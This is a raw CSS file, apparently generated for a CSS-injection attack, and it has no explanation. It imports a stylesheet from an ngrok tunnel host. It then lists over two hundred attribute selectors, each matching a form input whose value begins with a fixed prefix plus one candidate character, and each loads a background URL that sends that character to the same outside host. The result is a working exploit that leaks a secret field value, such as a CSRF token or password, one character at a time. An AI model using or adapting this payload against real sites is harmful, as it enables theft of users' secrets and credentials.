@import url("http://bc0a37bcf1d5.ngrok.io/?l=15");
input[value="ovojemojalozi!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.6858785250539567");}
input[value="ovojemojalozi\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.7060197121321741");}
input[value="ovojemojalozi#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.6766529873679059");}
input[value="ovojemojalozi$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.6212474826290149");}
input[value="ovojemojalozi%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.00809597364997039");}
input[value="ovojemojalozi&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.023333115608978883");}
input[value="ovojemojalozi'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.5895920186059622");}
input[value="ovojemojalozi("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.762304433629988");}
input[value="ovojemojalozi)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.9837540014738593");}
input[value="ovojemojalozi*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.9307026462731867");}
input[value="ovojemojalozi+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.7387507870878025");}
input[value="ovojemojalozi,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.401662063352495");}
input[value="ovojemojalozi-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.28819282425076276");}
input[value="ovojemojalozi."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.6810044920575995");}
input[value="ovojemojalozi/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.11312069533303437");}
input[value="ovojemojalozi0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.46890676811519727");}
input[value="ovojemojalozi1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.27062349522502527");}
input[value="ovojemojalozi2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.11960568443098629");}
input[value="ovojemojalozi3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.24502198120261665");}
input[value="ovojemojalozi4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.3735438884934157");}
input[value="ovojemojalozi5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.902007486469482");}
input[value="ovojemojalozi6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.7206748346140304");}
input[value="ovojemojalozi7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.2869307375505574");}
input[value="ovojemojalozi8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.21364434422567835");}
input[value="ovojemojalozi9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.1359501123307323");}
input[value="ovojemojalozi:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.21412792983480378");}
input[value="ovojemojalozi;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.8792836284803676");}
input[value="ovojemojalozi<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.03477363263038935");}
input[value="ovojemojalozi="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.1590806256680639");}
input[value="ovojemojalozi>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.9005889645756686");}
input[value="ovojemojalozi?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.9482046125322547");}
input[value="ovojemojalozi@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.8201892606424481");}
input[value="ovojemojaloziA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.49347932426128716");}
input[value="ovojemojaloziB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.8116894804957249");}
input[value="ovojemojaloziC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.047035651769093745");}
input[value="ovojemojaloziD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.5539909202307967");}
input[value="ovojemojaloziE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.8807222374333659");}
input[value="ovojemojaloziF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.7818465884274193");}
input[value="ovojemojaloziG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.9748524481401653");}
input[value="ovojemojaloziH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.35523018546284346");}
input[value="ovojemojaloziI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.04319993180119486");}
input[value="ovojemojaloziJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.07498197483150704");}
input[value="ovojemojaloziK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.4363602949584571");}
input[value="ovojemojaloziL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.8043418429559674");}
input[value="ovojemojaloziM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.9775558160477922");}
input[value="ovojemojaloziN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.42720470138149325");}
input[value="ovojemojaloziO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.4772919469530661");}
input[value="ovojemojaloziP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.6421393271558229");}
input[value="ovojemojaloziQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.07534133320092007");}
input[value="ovojemojaloziR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.6605940121062976");}
input[value="ovojemojaloziS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.10371142843027026");}
input[value="ovojemojaloziT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.7903084247524619");}
input[value="ovojemojaloziU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.897243890700552");}
input[value="ovojemojaloziV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.34146900783025025");}
input[value="ovojemojaloziW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.3085658404111864");}
input[value="ovojemojaloziX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.5695188832644331");}
input[value="ovojemojaloziY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.0620148545812067");}
input[value="ovojemojaloziZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.3781420424049191");}
input[value="ovojemojalozi["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.10181700829999718");}
input[value="ovojemojalozi\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.5901669734534776");}
input[value="ovojemojalozi]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.7446944437250635");}
input[value="ovojemojalozi^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.42200377319530014");}
input[value="ovojemojalozi_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.23882920402067698");}
input[value="ovojemojalozi`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.3338815545177931");}
input[value="ovojemojalozia"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.6997529717474347");}
input[value="ovojemojalozib"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.5369953709365598");}
input[value="ovojemojalozic"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.3688446917649748");}
input[value="ovojemojalozid"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.9159540023653805");}
input[value="ovojemojalozie"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.09319860179147077");}
input[value="ovojemojalozif"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.08324780120387221");}
input[value="ovojemojalozig"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.8359586427551347");}
input[value="ovojemojalozih"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.06585148977907984");}
input[value="ovojemojalozii"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.20470666918354152");}
input[value="ovojemojalozij"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.11252434012542945");}
input[value="ovojemojalozik"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.7384482512064379");}
input[value="ovojemojalozil"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.5626008584598852");}
input[value="ovojemojalozim"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.9665653815172499");}
input[value="ovojemojalozin"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.1742233081776392");}
input[value="ovojemojalozio"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.08799947855543966");}
input[value="ovojemojalozip"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.1618160317713584");}
input[value="ovojemojaloziq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.07764231982715808");}
input[value="ovojemojalozir"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.11171018254635534");}
input[value="ovojemojalozis"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.04430854430291009");}
input[value="ovojemojalozit"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.35133179096089573");}
input[value="ovojemojaloziu"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.617615737679241");}
input[value="ovojemojaloziv"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.4972989294198966");}
input[value="ovojemojaloziw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.8147193266365771");}
input[value="ovojemojalozix"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.11440519240321567");}
input[value="ovojemojaloziy"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.49305514218340507");}
input[value="ovojemojaloziz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.7741220689122565");}
input[value="ovojemojalozi{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.6963060384657735");}
input[value="ovojemojalozi|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.8923367304072571");}
input[value="ovojemojalozi}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.8761201286213982");}
input[value="ovojemojalozi~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.9243190388678482");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7026655044097234");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6014819408835497");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7065032677687522");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2566521654069016");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9405002097027324");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.14366130729843074");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.15451512503304565");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6431543410494058");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.11758263444236627");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.35560296508568245");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3378072502761498");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.610960854116158");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4018571522122212");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9551898889093071");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7912395913597607");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7492149079274648");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.30704720620720005");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4620115129885627");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9145225609780239");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.41665541868506506");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3814332456944436");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5354069806404291");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.06768392214087737");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9455589615221591");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9596019896153243");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.1404168485179822");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.981365064088281");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6134581846684874");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.998908924670977");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2023756724542829");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.05251570330006472");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8304326508409512");}
input[value="ovojemojalozi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.14206914898272838");}
input[value="ovojemojalozi "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.8552949092637019");}
input[value="ovojemojalozi¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.8149079359039446");}
input[value="ovojemojalozi¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.2615800302723579");}
input[value="ovojemojalozi£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.17684683381380362");}
input[value="ovojemojalozi¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.88707649322957");}
input[value="ovojemojalozi¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.9972877180204691");}
input[value="ovojemojalozi¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.5785380032648659");}
input[value="ovojemojalozi§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.5918283436807708");}
input[value="ovojemojalozi¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.0550500085192851");}
input[value="ovojemojalozi©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.1129778889032349");}
input[value="ovojemojaloziª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.6685654695365155");}
input[value="ovojemojalozi«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.4773078176108563");}
input[value="ovojemojalozi¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.3589138310305009");}
input[value="ovojemojalozi­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.01499439878559139");}
input[value="ovojemojalozi®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.8330814614760595");}
input[value="ovojemojalozi¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.39863954007875035");}
input[value="ovojemojalozi°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.14306419634348866");}
input[value="ovojemojalozi±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.6195267296577822");}
input[value="ovojemojalozi²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.5142648194300952");}
input[value="ovojemojalozi³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.21890934185698607");}
input[value="ovojemojalozi´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.306735883883122");}
input[value="ovojemojaloziµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.22934161269505648");}
input[value="ovojemojalozi¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.5211264480163562");}
input[value="ovojemojalozi·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.1265554613542954");}
input[value="ovojemojalozi¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.7405599510625744");}
input[value="ovojemojalozi¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.9470877897750829");}
input[value="ovojemojaloziº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.3431185772219778");}
input[value="ovojemojalozi»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.2488336247969709");}
input[value="ovojemojalozi¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.14347854592625886");}
input[value="ovojemojalozi½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.8121773053762882");}
input[value="ovojemojalozi¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.027309031825145214");}
input[value="ovojemojalozi¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.9006779555733166");}
input[value="ovojemojaloziÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.2964735690185456");}
input[value="ovojemojaloziÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.6088196237439352");}
input[value="ovojemojaloziÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.3197984669906726");}
input[value="ovojemojaloziÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.685709114777703");}
input[value="ovojemojaloziÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.7026893233482618");}
input[value="ovojemojaloziÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.6035838737974857");}
input[value="ovojemojaloziÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.954743983813777");}
input[value="ovojemojaloziÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.46090269576541276");}
input[value="ovojemojaloziÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.2403982481428808");}
input[value="ovojemojaloziÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.1941980025800225");}
input[value="ovojemojaloziÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.6098056541821881");}
input[value="ovojemojaloziË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.02672569509701761");}
input[value="ovojemojaloziÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.958310412984416");}
input[value="ovojemojaloziÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.8736983425561744");}
input[value="ovojemojaloziÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.998364201700044");}
input[value="ovojemojaloziÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.9830107867735296");}
input[value="ovojemojaloziÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.2057038246572005");}
input[value="ovojemojaloziÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.8862375486866807");}
input[value="ovojemojaloziÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.3160489750038984");}
input[value="ovojemojaloziÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.9204579020626442");}
input[value="ovojemojaloziÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.7612312129625267");}
input[value="ovojemojaloziÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.2939461133265877");}
input[value="ovojemojaloziÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.24006042168882202");}
input[value="ovojemojalozi×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.8394065608115897");}
input[value="ovojemojaloziØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.29796797956415966");}
input[value="ovojemojaloziÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.05243246452018724");}
input[value="ovojemojaloziÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.8648127177798584");}
input[value="ovojemojaloziÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.9634708305328947");}
input[value="ovojemojaloziÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.720599339809278");}
input[value="ovojemojaloziÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.24208062814556008");}
input[value="ovojemojaloziÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.37473740001999634");}
input[value="ovojemojaloziß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.913437512048932");}
input[value="ovojemojalozià"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.4758596183623527");}
input[value="ovojemojaloziá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.9375834893977504");}
input[value="ovojemojaloziâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.40746354362242676");}
input[value="ovojemojaloziã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.7689474583648592");}
input[value="ovojemojaloziä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.8690939573697729");}
input[value="ovojemojaloziå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.7451384825808045");}
input[value="ovojemojaloziæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.6238881039121777");}
input[value="ovojemojaloziç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.7489724018635973");}
input[value="ovojemojaloziè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.7079447433114068");}
input[value="ovojemojalozié"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.41190189518478126");}
input[value="ovojemojaloziê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.018055384188254475");}
input[value="ovojemojalozië"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.41582915798707387");}
input[value="ovojemojaloziì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.6552388369148126");}
input[value="ovojemojalozií"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.5094537043843805");}
input[value="ovojemojaloziî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.42788355760843055");}
input[value="ovojemojaloziï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.19309493883135254");}
input[value="ovojemojalozið"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.7093338899742683");}
input[value="ovojemojaloziñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.09862146844732878");}
input[value="ovojemojaloziò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.9830439789235064");}
input[value="ovojemojalozió"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.6617019491662139");}
input[value="ovojemojaloziô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.76885565804048");}
input[value="ovojemojaloziõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.9546061443577003");}
input[value="ovojemojaloziö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.4755519415325735");}
input[value="ovojemojalozi÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.8229703515767983");}
input[value="ovojemojaloziø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.7669451889672596");}
input[value="ovojemojaloziù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.04557139964195289");}
input[value="ovojemojaloziú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.6612468310707893");}
input[value="ovojemojaloziû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.5281983593392126");}
input[value="ovojemojaloziü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.6580505148834392");}
input[value="ovojemojaloziý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.011662946014804998");}
input[value="ovojemojaloziþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.8498117263161711");}
input[value="ovojemojaloziÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.7899131744215895");}
